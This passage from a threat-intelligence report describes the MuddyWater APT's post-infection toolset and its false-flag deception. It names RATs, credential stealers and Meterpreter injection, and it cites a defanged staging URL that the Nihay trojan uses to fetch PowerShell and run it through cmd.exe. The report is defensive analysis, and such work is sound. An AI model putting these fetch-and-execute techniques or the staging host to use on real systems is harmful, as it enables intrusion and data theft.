I know what you did last summer, MuddyWater blending in the crowd

[harlan4096]

Introduction

MuddyWater is an APT with a focus on governmental and telco targets in the Middle East (Iraq, Saudi Arabia, Bahrain, Jordan, Turkey and Lebanon) and also a few other countries in nearby regions (Azerbaijan, Pakistan and Afghanistan).

MuddyWater first surfaced in 2017 and has been active continuously, targeting a large number of organizations. First stage infections and graphical decoys have been described by multiple sources, including in our previous research: “MuddyWater expands operations“

Nevertheless, comprehensive details of what happens after the initial infection by MuddyWater have not previously been made publicly available. MuddyWater attackers deploy a variety of tools and techniques, mostly developed by the group itself in Python, C# and PowerShell, to implement their attacks and complete their victim infiltration and data exfiltration. Examples of such tools include multiple download/execute tools and RATs in C# and Python, SSH Python script, multiple Python tools for extraction of credentials, history and more.

This report details a collection of tools used by this threat actor on its targets after initial infection. It also details deceptive techniques used to divert investigations once attack tools have been deployed inside victim systems (such as Chinese strings, Russian strings and impersonation of the “RXR Saudi Arabia” hacking group). The investigation revealed additional OPSEC mistakes by the attackers, but we are not detailing those here due to ongoing law enforcement investigations.

Attackers’ toolset analysis

During our research on MuddyWater campaigns, we were able to identify a number of tools and scripts used by this actor, providing a good understanding of this actor’s abilities. Most of the tools used are custom developed, while others are based on more generic and publicly available ones.

The list includes:

* Nihay – C# Download-and-Execute tool
* LisfonService – C# RAT
* Client.py – Python RAT
* Client-win.py – SSH Python script
* Rc.py/Rc.exe – Basic Python RAT
* VBScript and VBA files
* Third-party scripts (Muddy, Losi Boomber, Slaver reverse tunnel…)
* Second stage PowerShell scripts

Most of these tools are scripts written in Python or PowerShell. We noticed that MuddyWater compiles various offensive Python scripts into executables for portability, using Py2Exe and PyInstaller for this task. This includes Python scripts such as “CrackMapExec”, “shootback” and “Lazagne”.

We have also noticed the use of “PS2EXE” to convert PowerShell scripts into executables, with the original PowerShell code embedded as a Base64-encoded string. In other cases, we have noticed a preference for using PowerShell Reflective DLL injection to deploy Metasploit Stageless Meterpreters. They use both 32-Bit and 64-Bit versions. Usually, the Stageless Meterpreter has the “Ext_server_stdapi.x64.dll”, “Ext_server_extapi.x64.dll”, and “Ext_server_espia.x64.dll” extensions.

Nihay – C# Download-and-Execute tool

The tool called “Nihay” (as per its Pdb) is a basic “Download-and-Execute” Trojan written in C#. It downloads a PowerShell one-liner from a hardcoded URL (for instance, https://beepaste[.]io/view/raw/pPCMo1) and passes it to “cmd.exe /c”.

Continue Reading